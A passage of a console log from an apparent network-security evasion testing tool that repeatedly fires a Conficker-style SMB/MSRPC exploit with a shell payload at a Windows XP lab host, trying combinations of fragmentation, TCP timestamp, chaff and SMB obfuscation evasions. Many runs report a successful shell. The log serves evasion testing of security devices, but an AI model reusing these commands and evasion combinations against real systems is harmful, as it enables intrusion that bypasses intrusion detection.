  5666. - Add a random urgent data byte to every 2nd TCP segment.
  5667.  
  5668. Info: NetBIOS connection 10.62.90.113:39306 -> 10.35.1.207:445
  5669. Terminated
  5670. .....
  5671. 9502 runs averaging 1.89 runs / second ; progress: 5018/43200....
  5672. 9506 runs averaging 1.89 runs / second ; progress: 5023/43200...........2015-06-08 00:43:17 INFO
  5673. Success. (10.62.90.113):
  5674. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=17032 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=rkDra41C6CA --evasion=[smb_connect,smb_opentree]ipv4_frag,"64" --evasion=[msrpc_bind,msrpc_req]ipv4_opt,"25%","inc","alphanumrandomized" --evasion=[smb_opentree,end]tcp_paws,"1","4","random" --verifydelay=1000 --payload=shell
  5675. Info: Using random seed rkDra41C6CC
  5676. The following evasions are applied from stage smb_connect to smb_opentree:
  5677. - IPv4 fragments with at most 64 bytes per fragment
  5678. The following evasions are applied from stage smb_opentree to end:
  5679. - Every TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has random bytes as payload
  5680. The following evasions are applied from stage msrpc_bind to msrpc_req:
  5681. - 25% probability to send a duplicate IPv4 packet with an incrementing DWORD in the options field.
  5682. The duplicate packet has identical payload except that alphanumeric characters are randomized
  5683.  
  5684. Info: NetBIOS connection 10.62.90.113:17032 -> 10.35.1.207:445
  5685. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5686. Info: Sending MSRPC request with exploit
  5687. Info: Shell found, attack succeeded
  5688. Info: Shell closed
  5689. 0: Success.
  5690. ..
  5691. 9520 runs averaging 1.89 runs / second ; progress: 5028/43200.......
  5692. 9527 runs averaging 1.89 runs / second ; progress: 5033/43200......
  5693. 9533 runs averaging 1.89 runs / second ; progress: 5038/43200.Pid 13797 timed out - killed
  5694. 2015-06-08 00:43:28 INFO
  5695. Timed out (10.62.90.114):
  5696. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=45463 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=BmVQm+XD3os --evasion=[msrpc_req,end]tcp_tsoptreply,"le" --evasion=[smb_openpipe,end]tcp_urgent,"75%","zero" --verifydelay=1000 --payload=shell
  5697. Info: Using random seed BmVQm+XD3os
  5698. The following evasions are applied from stage smb_openpipe to end:
  5699. - 75% probability to add a zero urgent data byte to a TCP segment.
  5700. The following evasions are applied from stage msrpc_req to end:
  5701. - TCP timestamps echo reply value is sent in the wrong endianness
  5702.  
  5703. Info: NetBIOS connection 10.62.90.114:45463 -> 10.35.1.207:445
  5704. Terminated
  5705. .........
  5706. 9544 runs averaging 1.89 runs / second ; progress: 5043/43200..........
  5707. 9554 runs averaging 1.89 runs / second ; progress: 5048/43200......
  5708. 9560 runs averaging 1.89 runs / second ; progress: 5053/43200
  5709. 9560 runs averaging 1.89 runs / second ; progress: 5058/43200...
  5710. 9563 runs averaging 1.89 runs / second ; progress: 5063/43200.......
  5711. 9570 runs averaging 1.89 runs / second ; progress: 5068/43200........
  5712. 9578 runs averaging 1.89 runs / second ; progress: 5073/43200...
  5713. 9581 runs averaging 1.89 runs / second ; progress: 5078/43200....
  5714. 9585 runs averaging 1.89 runs / second ; progress: 5083/43200..........
  5715. 9595 runs averaging 1.89 runs / second ; progress: 5088/43200...2015-06-08 00:44:19 INFO
  5716. Success. (10.62.90.113):
  5717. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=51195 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=WX0LabE5SUM --evasion=[smb_connect,msrpc_bind]netbios_chaff,"21","empty_unspec|empty_keepalive|small_unspec|http_post|broken_length" --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"6","6","7","random_msrpcbind" --verifydelay=1000 --payload=shell
  5718. Info: Using random seed WX0LabE5SUN
  5719. The following evasions are applied from stage smb_connect to msrpc_bind:
  5720. - Before every 21th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
  5721. The following evasions are applied from stage smb_opentree to msrpc_req:
  5722. - Before normal SMB writes, 6 SMB trees are opened and 6 writes are performed to them. The write payload is 7 bytes of MSRPC bind-like data.
  5723.  
  5724. Info: NetBIOS connection 10.62.90.113:51195 -> 10.35.1.207:445
  5725. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5726. Info: Sending MSRPC request with exploit
  5727. Info: Shell found, attack succeeded
  5728. Info: Shell closed
  5729. 0: Success.
  5730. ........
  5731. 9607 runs averaging 1.89 runs / second ; progress: 5093/43200.Pid 14503 timed out - killed
  5732. 2015-06-08 00:44:24 INFO
  5733. Timed out (10.62.90.110):
  5734. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=24836 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=crQp6CU8s8g --evasion=[netbios_connect,msrpc_bind]ipv4_frag,"64" --evasion=[smb_openpipe,end]tcp_urgent,"1","random_alpha" --verifydelay=1000 --payload=shell
  5735. Info: Using random seed crQp6CU8s8h
  5736. The following evasions are applied from stage netbios_connect to msrpc_bind:
  5737. - IPv4 fragments with at most 64 bytes per fragment
  5738. The following evasions are applied from stage smb_openpipe to end:
  5739. - Add a random alphaurgent data byte to every 1 TCP segment.
  5740.  
  5741. Info: NetBIOS connection 10.62.90.110:24836 -> 10.35.1.207:445
  5742. Terminated
  5743. .....
  5744. 9614 runs averaging 1.89 runs / second ; progress: 5098/43200......
  5745. 9620 runs averaging 1.89 runs / second ; progress: 5103/43200.........
  5746. 9629 runs averaging 1.89 runs / second ; progress: 5108/43200..........
  5747. 9639 runs averaging 1.89 runs / second ; progress: 5113/43200.........
  5748. 9648 runs averaging 1.89 runs / second ; progress: 5118/43200.......
  5749. 9655 runs averaging 1.88 runs / second ; progress: 5123/43200.....
  5750. 9660 runs averaging 1.88 runs / second ; progress: 5128/43200.........
  5751. 9669 runs averaging 1.88 runs / second ; progress: 5133/43200.....
  5752. 9674 runs averaging 1.88 runs / second ; progress: 5138/43200.....
  5753. 9679 runs averaging 1.88 runs / second ; progress: 5143/43200...........
  5754. 9690 runs averaging 1.88 runs / second ; progress: 5148/43200...........
  5755. 9701 runs averaging 1.88 runs / second ; progress: 5153/43200...2015-06-08 00:45:25 INFO
  5756. Success. (10.62.90.114):
  5757. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=35341 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=ggSUJv4b+PQ --evasion=[smb_openpipe,end]smb_writeandxpad,"6","random" --evasion=[start,end]tcp_paws,"50%","187349922","random" --verifydelay=1000 --payload=shell
  5758. Info: Using random seed ggSUJv4b+PS
  5759. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 187349922> and has random bytes as payload
  5760. The following evasions are applied from stage smb_openpipe to end:
  5761. - 6 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random bytes.
  5762.  
  5763. Info: NetBIOS connection 10.62.90.114:35341 -> 10.35.1.207:445
  5764. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5765. Info: Sending MSRPC request with exploit
  5766. Info: Shell found, attack succeeded
  5767. Info: Command shell connection reset.
  5768. Info: CommandShell::SendCommand() - Failed to send string
  5769. Info: Shell closed
  5770. 0: Success.
  5771. 2015-06-08 00:45:25 INFO
  5772. Success. (10.62.90.110):
  5773. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=58158 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=xTjXRzVMytY --evasion=[smb_opentree,end]tcp_paws,"5","9","shuffle" --evasion=[smb_openpipe,end]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
  5774. Info: Using random seed xTjXRzVMytb
  5775. The following evasions are applied from stage smb_opentree to end:
  5776. - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has shuffled original payload
  5777. The following evasions are applied from stage smb_openpipe to end:
  5778. - TCP timestamps echo reply value is sent in the wrong endianness
  5779.  
  5780. Info: NetBIOS connection 10.62.90.110:58158 -> 10.35.1.207:445
  5781. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5782. Info: Sending MSRPC request with exploit
  5783. Info: Shell found, attack succeeded
  5784. Info: Shell closed
  5785. 0: Success.
  5786. ....
  5787. 9710 runs averaging 1.88 runs / second ; progress: 5158/43200......
  5788. 9716 runs averaging 1.88 runs / second ; progress: 5163/43200.....
  5789. 9721 runs averaging 1.88 runs / second ; progress: 5168/43200..
  5790. 9723 runs averaging 1.88 runs / second ; progress: 5173/43200Pid 15235 timed out - killed
  5791. 2015-06-08 00:45:43 INFO
  5792. Timed out (10.62.90.111):
  5793. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=62990 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=F8rOXONBWIg --evasion=[smb_opentree,smb_openpipe]smb_decoytrees,"3","5","90","random" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"50%","random_alpha" --verifydelay=1000 --payload=shell
  5794. Info: Using random seed F8rOXONBWIg
  5795. The following evasions are applied from stage smb_opentree to smb_openpipe:
  5796. - Before normal SMB writes, 3 SMB trees are opened and 5 writes are performed to them. The write payload is 90 random bytes.
  5797. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  5798. - 50% probability to add a random alphaurgent data byte to a TCP segment.
  5799.  
  5800. Info: NetBIOS connection 10.62.90.111:62990 -> 10.35.1.207:445
  5801. Terminated
  5802. ............
  5803. 9736 runs averaging 1.88 runs / second ; progress: 5178/43200......
  5804. 9742 runs averaging 1.88 runs / second ; progress: 5183/43200
  5805. 9742 runs averaging 1.88 runs / second ; progress: 5188/43200
  5806. 9742 runs averaging 1.88 runs / second ; progress: 5193/43200....
  5807. 9746 runs averaging 1.87 runs / second ; progress: 5198/43200..
  5808. 9748 runs averaging 1.87 runs / second ; progress: 5203/43200
  5809. 9748 runs averaging 1.87 runs / second ; progress: 5208/43200..
  5810. 9750 runs averaging 1.87 runs / second ; progress: 5213/43200.....
  5811. 9755 runs averaging 1.87 runs / second ; progress: 5218/43200.....
  5812. 9760 runs averaging 1.87 runs / second ; progress: 5223/43200......
  5813. 9766 runs averaging 1.87 runs / second ; progress: 5228/43200Pid 16139 timed out - killed
  5814. 2015-06-08 00:46:38 INFO
  5815. Timed out (10.62.90.119):
  5816. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18534 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=UWQTgxLgPHQ --evasion=[start,end]tcp_chaff,"13","nullchksum|outofwindow","alphanumrandomized" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"1","random" --evasion=[smb_openpipe,end]tcp_urgent,"25%","random_alpha" --verifydelay=1000 --payload=shell
  5817. Info: Using random seed UWQTgxLgPHR
  5818. - With every 13 TCP packet a TCP chaff packet is sent. The chaff packet has:
  5819. * NULL TCP checksum.
  5820. * An out-of-window sequence number.
  5821. * Duplicate packet has original payload with alphanumeric bytes randomized
  5822. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  5823. - Add a random urgent data byte to every 1 TCP segment.
  5824. The following evasions are applied from stage smb_openpipe to end:
  5825. - 25% probability to add a random alphaurgent data byte to a TCP segment.
  5826.  
  5827. Info: NetBIOS connection 10.62.90.119:18534 -> 10.35.1.207:445
  5828. Terminated
  5829. .2015-06-08 00:46:39 INFO
  5830. Success. (10.62.90.114):
  5831. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=61513 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=5kiMdDy3TFI --evasion=[smb_connect,msrpc_req]smb_writeandxpad,"2","zero" --evasion=[msrpc_bind,end]tcp_paws,"3","5","alphanumrandomized" --verifydelay=1000 --payload=shell
  5832. Info: Using random seed 5kiMdDy3TFL
  5833. The following evasions are applied from stage smb_connect to msrpc_req:
  5834. - 2 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of zero bytes.
  5835. The following evasions are applied from stage msrpc_bind to end:
  5836. - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has original payload with alphanumeric bytes randomized
  5837.  
  5838. Info: NetBIOS connection 10.62.90.114:61513 -> 10.35.1.207:445
  5839. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5840. Info: Sending MSRPC request with exploit
  5841. Info: Shell found, attack succeeded
  5842. Info: Shell closed
  5843. 0: Success.
  5844. ...............
  5845. 9784 runs averaging 1.87 runs / second ; progress: 5233/43200..............
  5846. 9798 runs averaging 1.87 runs / second ; progress: 5238/43200...........2015-06-08 00:46:52 INFO
  5847. Success. (10.62.90.111):
  5848. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=11372 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=lnUUcWzYjN4 --evasion=[start,msrpc_req]tcp_chaff,"25%","nullchksum|nullflag","random_alpha" --evasion=[start,msrpc_req]tcp_paws,"75%","144672393","alphanumrandomized" --verifydelay=1000 --payload=shell
  5849. Info: Using random seed lnUUcWzYjN6
  5850. The following evasions are applied from stage start to msrpc_req:
  5851. - 25% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
  5852. * NULL TCP checksum.
  5853. * NULL TCP control flags.
  5854. * Duplicate packet has random alpha bytes as payload
  5855. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 144672393> and has original payload with alphanumeric bytes randomized
  5856.  
  5857. Info: NetBIOS connection 10.62.90.111:11372 -> 10.35.1.207:445
  5858. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5859. Info: Sending MSRPC request with exploit
  5860. Info: Shell found, attack succeeded
  5861. Info: CommandShell::SendCommand() - Failed to send string
  5862. Info: Command shell connection reset.
  5863. Info: Shell closed
  5864. 0: Success.
  5865. .
  5866. 9811 runs averaging 1.87 runs / second ; progress: 5243/43200............
  5867. 9823 runs averaging 1.87 runs / second ; progress: 5248/43200.......
  5868. 9830 runs averaging 1.87 runs / second ; progress: 5253/43200.....
  5869. 9835 runs averaging 1.87 runs / second ; progress: 5258/43200..Pid 16829 timed out - killed
  5870. 2015-06-08 00:47:11 INFO
  5871. Timed out (10.62.90.118):
  5872. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=31195 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=g3i822C4j6o --evasion=[smb_opentree,smb_openpipe]smb_decoytrees,"7","7","1","random_msrpcbind" --evasion=[smb_opentree,msrpc_bind]tcp_chaff,"50%","longhdr","zero" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","random_alpha" --verifydelay=1000 --payload=shell
  5873. Info: Using random seed g3i822C4j6q
  5874. The following evasions are applied from stage smb_opentree to msrpc_bind:
  5875. - 50% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
  5876. * TCP header longer than packet total size
  5877. * Duplicate packet has 0x00 bytes as payload
  5878. - Add a random alphaurgent data byte to every 2 TCP segment.
  5879. The following evasions are applied from stage smb_opentree to smb_openpipe:
  5880. - Before normal SMB writes, 7 SMB trees are opened and 7 writes are performed to them. The write payload is 1 bytes of MSRPC bind-like data.
  5881.  
  5882. Info: NetBIOS connection 10.62.90.118:31195 -> 10.35.1.207:445
  5883. Terminated
  5884. ......
  5885. 9844 runs averaging 1.87 runs / second ; progress: 5263/43200.
  5886. 9845 runs averaging 1.87 runs / second ; progress: 5268/43200
  5887. 9845 runs averaging 1.87 runs / second ; progress: 5273/43200....
  5888. 9849 runs averaging 1.87 runs / second ; progress: 5278/43200..........
  5889. 9859 runs averaging 1.87 runs / second ; progress: 5283/43200.2015-06-08 00:47:34 INFO
  5890. Success. (10.62.90.118):
  5891. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=49009 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=pAFHX3UuQoc --evasion=[msrpc_bind,end]msrpc_ndrflag,"char_ebcdic","float_cray","byte3_nonzero","byte4_nonzero" --evasion=[msrpc_bind,end]tcp_paws,"1","3","random_alpha" --verifydelay=1000 --payload=shell
  5892. Info: Using random seed pAFHX3UuQoe
  5893. The following evasions are applied from stage msrpc_bind to end:
  5894. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has random alpha bytes as payload
  5895. - MSRPC NDR flag is modified:
  5896. * EBCDIC character encoding
  5897. * Cray floating point value encoding
  5898. * Reserved 3rd byte is set to a random non-zero value
  5899. * Reserved 4th byte is set to a random non-zero value
  5900.  
  5901.  
  5902. Info: NetBIOS connection 10.62.90.118:49009 -> 10.35.1.207:445
  5903. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5904. Info: Sending MSRPC request with exploit
  5905. Info: Shell found, attack succeeded
  5906. Info: Shell closed
  5907. 0: Success.
  5908. ..Pid 17242 timed out - killed
  5909. 2015-06-08 00:47:36 INFO
  5910. Timed out (10.62.90.112):
  5911. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37714 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=zMj0U5a/Pp0 --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"50%","random_alphanum" --evasion=[smb_opentree,end]tcp_urgent,"13","random_alphanum" --verifydelay=1000 --payload=shell
  5912. Info: Using random seed zMj0U5a/Pp3
  5913. The following evasions are applied from stage smb_opentree to msrpc_bind:
  5914. - 50% probability to add a random alphanumeric urgent data byte to a TCP segment.
  5915. The following evasions are applied from stage smb_opentree to end:
  5916. - Add a random alphanumeric urgent data byte to every 13 TCP segment.
  5917.  
  5918. Info: NetBIOS connection 10.62.90.112:37714 -> 10.35.1.207:445
  5919. Terminated
  5920. .....
  5921. 9869 runs averaging 1.87 runs / second ; progress: 5288/43200........
  5922. 9877 runs averaging 1.87 runs / second ; progress: 5293/43200.
  5923. 9878 runs averaging 1.86 runs / second ; progress: 5298/43200
  5924. 9878 runs averaging 1.86 runs / second ; progress: 5303/43200Pid 17425 timed out - killed
  5925. 2015-06-08 00:47:55 INFO
  5926. Timed out (10.62.90.115):
  5927. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=46226 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=phYQAl9P9Ek --evasion=[smb_openpipe,msrpc_bind]netbios_chaff,"5","empty_unspec|empty_keepalive|http_post|msrpc_req" --evasion=[smb_connect,msrpc_bind]tcp_urgent,"25%","zero" --verifydelay=1000 --payload=shell
  5928. Info: Using random seed phYQAl9P9Em
  5929. The following evasions are applied from stage smb_connect to msrpc_bind:
  5930. - 25% probability to add a zero urgent data byte to a TCP segment.
  5931. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  5932. - Before every 5th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload.
  5933.  
  5934. Info: NetBIOS connection 10.62.90.115:46226 -> 10.35.1.207:445
  5935. Terminated
  5936. ...........
  5937. 9890 runs averaging 1.86 runs / second ; progress: 5308/43200...........
  5938. 9901 runs averaging 1.86 runs / second ; progress: 5314/43200..2015-06-08 00:48:05 INFO
  5939. Success. (10.62.90.118):
  5940. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=51959 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=+VYvQ2mQ8bE --evasion=[smb_connect,end]smb_chaff,"5","write_flag","alphanum" --evasion=[smb_connect,smb_opentree]smb_writeandxpad,"1022","random" --evasion=[smb_openpipe,end]tcp_paws,"75%","8","random" --verifydelay=1000 --payload=shell
  5941. Info: Using random seed +VYvQ2mQ8bH
  5942. The following evasions are applied from stage smb_connect to end:
  5943. - Before every 5th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random alphanumeric payload
  5944. The following evasions are applied from stage smb_connect to smb_opentree:
  5945. - 1022 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random bytes.
  5946. The following evasions are applied from stage smb_openpipe to end:
  5947. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has random bytes as payload
  5948.  
  5949. Info: NetBIOS connection 10.62.90.118:51959 -> 10.35.1.207:445
  5950. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5951. Info: Sending MSRPC request with exploit
  5952. Info: Shell found, attack succeeded
  5953. Info: Shell closed
  5954. 0: Success.
  5955. ...
  5956. 9907 runs averaging 1.86 runs / second ; progress: 5319/43200.......
  5957. 9914 runs averaging 1.86 runs / second ; progress: 5324/43200..............
  5958. 9928 runs averaging 1.86 runs / second ; progress: 5329/43200.............
  5959. 9941 runs averaging 1.86 runs / second ; progress: 5334/43200....
  5960. 9945 runs averaging 1.86 runs / second ; progress: 5339/43200.Pid 17947 timed out - killed
  5961. 2015-06-08 00:48:29 INFO
  5962. Timed out (10.62.90.116):
  5963. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=19121 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=DkgYBia6gZ4 --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"5","2","10","random" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"5","zero" --evasion=[smb_opentree,end]tcp_urgent,"2","random_alphanum" --verifydelay=1000 --payload=shell
  5964. Info: Using random seed DkgYBia6gZ4
  5965. The following evasions are applied from stage smb_opentree to msrpc_bind:
  5966. - Add a zero urgent data byte to every 5 TCP segment.
  5967. The following evasions are applied from stage smb_opentree to end:
  5968. - Add a random alphanumeric urgent data byte to every 2 TCP segment.
  5969. The following evasions are applied from stage smb_opentree to msrpc_req:
  5970. - Before normal SMB writes, 5 SMB trees are opened and 2 writes are performed to them. The write payload is 10 random bytes.
  5971.  
  5972. Info: NetBIOS connection 10.62.90.116:19121 -> 10.35.1.207:445
  5973. Terminated
  5974. ........
  5975. 9955 runs averaging 1.86 runs / second ; progress: 5344/43200.....2015-06-08 00:48:36 INFO
  5976. Success. (10.62.90.112):
  5977. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37931 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=gb7yxSxJuLs --evasion=[netbios_connect,msrpc_req]tcp_paws,"1","240184953","alphanumrandomized" --evasion=[smb_opentree,msrpc_req]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
  5978. Info: Using random seed gb7yxSxJuLu
  5979. The following evasions are applied from stage netbios_connect to msrpc_req:
  5980. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 240184953> and has original payload with alphanumeric bytes randomized
  5981. The following evasions are applied from stage smb_opentree to msrpc_req:
  5982. - TCP timestamps echo reply value is sent in the wrong endianness
  5983.  
  5984. Info: NetBIOS connection 10.62.90.112:37931 -> 10.35.1.207:445
  5985. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5986. Info: Sending MSRPC request with exploit
  5987. Info: Shell found, attack succeeded
  5988. Info: Shell closed
  5989. 0: Success.
  5990. ......
  5991. 9967 runs averaging 1.86 runs / second ; progress: 5349/43200.....2015-06-08 00:48:40 INFO
  5992. Success. (10.62.90.115):
  5993. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=57198 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=gDU7yuN81Mg --evasion=[netbios_connect,smb_opentree]ipv4_opt,"2","inc","alphanumrandomized" --evasion=[msrpc_bind,msrpc_req]smb_fnameobf,"change_case|add_null_trailer" --evasion=[start,msrpc_req]tcp_paws,"1","268435453","random" --verifydelay=1000 --payload=shell
  5994. Info: Using random seed gDU7yuN81Mi
  5995. The following evasions are applied from stage start to msrpc_req:
  5996. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has random bytes as payload
  5997. The following evasions are applied from stage netbios_connect to smb_opentree:
  5998. - Every 2th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  5999. The duplicate packet has identical payload except that alphanumeric characters are randomized
  6000. The following evasions are applied from stage msrpc_bind to msrpc_req:
  6001. - The SMB filename is obfuscated:
  6002. * Random characters case is changed
  6003. * A 0x00 and random alphanumeric characters are appended to the filename
  6004.  
  6005. Info: NetBIOS connection 10.62.90.115:57198 -> 10.35.1.207:445
  6006. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  6007. Info: Sending MSRPC request with exploit
  6008. Info: Shell found, attack succeeded
  6009. Info: Shell closed
  6010. 0: Success.
  6011. ..2015-06-08 00:48:41 INFO
  6012. Success. (10.62.90.111):
  6013. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=57307 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=qWTEmsEyMHI --evasion=[smb_opentree,msrpc_bind]smb_chaff,"25%","write_flag","zero" --evasion=[smb_connect,msrpc_req]tcp_paws,"5","7","alphanumrandomized" --verifydelay=1000 --payload=shell
  6014. Info: Using random seed qWTEmsEyMHK
  6015. The following evasions are applied from stage smb_connect to msrpc_req:
  6016. - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 7> and has original payload with alphanumeric bytes randomized
  6017. The following evasions are applied from stage smb_opentree to msrpc_bind:
  6018. - 25% probability to send an SMB chaff message before real messages. The chaff is a WriteAndX message with a broken write mode flag, and has zeroes for payload
  6019.  
  6020. Info: NetBIOS connection 10.62.90.111:57307 -> 10.35.1.207:445
  6021. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  6022. Info: Sending MSRPC request with exploit
  6023. Info: Shell found, attack succeeded
  6024. Info: Shell closed
  6025. 0: Success.
  6026. .........
  6027. 9985 runs averaging 1.87 runs / second ; progress: 5354/43200..........2015-06-08 00:48:46 INFO
  6028. Success. (10.62.90.116):
  6029. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=30391 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=hCXgqyW1xgM --evasion=[smb_opentree,smb_openpipe]smb_writeandxpad,"6","random_alphanum" --evasion=[smb_openpipe,end]tcp_overlap,"4","new","random_alphanum" --evasion=[smb_connect,msrpc_req]tcp_paws,"75%","6247869","alphanumrandomized" --verifydelay=1000 --payload=shell
  6030. Info: Using random seed hCXgqyW1xgO
  6031. The following evasions are applied from stage smb_connect to msrpc_req:
- 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6247869> and has original payload with alphanumeric bytes randomized
The following evasions are applied from stage smb_opentree to smb_openpipe:
- 6 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random alphanumeric bytes.
The following evasions are applied from stage smb_openpipe to end:
- TCP segments are set to overlap by 4 bytes, with the later packet containing the correct payload. Overlapping part has random alphanumeric bytes as payload

